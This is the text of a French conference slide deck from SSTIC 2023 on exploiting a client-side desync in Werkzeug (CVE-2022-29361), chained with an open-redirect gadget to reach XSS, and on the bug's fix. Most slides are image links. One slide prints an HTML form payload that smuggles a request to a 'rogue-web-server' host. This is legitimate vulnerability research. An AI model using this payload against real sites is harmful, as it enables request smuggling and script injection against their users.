Abusing Client-Side Desync on Werkzeug
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Werkzeug
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10486673/pasted-from-clipboard.png)
Kévin GERVOT
1/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Bug de parsing
Kévin GERVOT
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10534197/2023-06-07-230027_1493x399.png)
2/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Que faire avec ce type de bug ?
Kévin GERVOT
3/27
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485588/client_side_desync_01.png)
Kévin GERVOT
4/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485572/client_side_desync_02.png)
Kévin GERVOT
5/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485573/client_side_desync_03.png)
Kévin GERVOT
6/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485575/client_side_desync_04.png)
Kévin GERVOT
7/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485576/client_side_desync_05.png)
Kévin GERVOT
8/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485577/client_side_desync_06.png)
Kévin GERVOT
9/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485578/client_side_desync_07.png)
Kévin GERVOT
10/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Client-Side Desync (CSD)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485580/client_side_desync_08.png)
Kévin GERVOT
11/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Exploitation d'une CSD
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10486674/pasted-from-clipboard.png)
Kévin GERVOT
12/27
Peut-on transformer une CSD en XSS ?
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Kévin GERVOT
13/27
Problématiques
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Kévin GERVOT
- Pas d'intéraction avec un serveur distant
- Pas de controle sur les fichiers du serveur vulnérable
- Pas de vulnérabilités supplémentaires
14/27
Idée d'exploitation
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485544/exploit_chain_01.png)
Kévin GERVOT
15/27
Comment trouver une redirection dans Werkzeug ?
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Kévin GERVOT
16/27
CVE-2020-28724
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485044/pasted-from-clipboard_1_.png)
Kévin GERVOT
17/27
CVE-2020-28724
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483699/open_redirect_01.png)
Kévin GERVOT
18/27
Fix de la CVE-2020-28724
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483735/open_redirect_03.png)
Kévin GERVOT
19/27
Gadget toujours présent
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483709/open_redirect_02.png)
Kévin GERVOT
20/27
Exploitation
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485663/open_redirect_05.png)
Kévin GERVOT
21/27
Comment mettre en place l'exploitation depuis un client ?
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Kévin GERVOT
22/27
Formulaire text/plain
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
<form action="http://vulnerable-website/" method="POST"
enctype="text/plain"
>
<textarea name="GET http://rogue-web-server:5000 HTTP/1.1
Foo: x">Mizu</textarea>
<button type="submit">START</button>
</form>
Kévin GERVOT
23/27
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483765/putting_all_together_02.png)
Formulaire text/plain
Kévin GERVOT
24/27
Exploitation de la vulnérabilité
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Kévin GERVOT
25/27
Correction du bug
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10485333/2023-05-19-125641_1086x346.png)
Kévin GERVOT
26/27
Conclusion
![](https://s3.amazonaws.com/media-p.slid.es/uploads/1918211/images/10483451/sstic.png)
Kévin GERVOT
27/27
SSTIC 2023 | Abusing Client-Side Desync on Werkzeug | CVE-2022-29361
By Kévin (Mizu)
SSTIC 2023 | Abusing Client-Side Desync on Werkzeug | CVE-2022-29361
- 1,209